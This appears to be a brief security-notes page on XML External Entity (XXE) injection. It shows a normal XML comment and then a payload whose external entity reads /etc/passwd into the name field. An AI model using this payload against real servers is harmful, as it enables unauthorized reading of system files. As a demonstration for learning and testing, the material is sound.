XML External Entity - XXE
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Jesus</name>
<author>Boy</author>
<com>blog post</com>
</comment><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///etc/passwd" >]>
<comment>
<name>&name;</name>
<author>Spongebob</author>
<com>random stuff</com>
</comment>Last updated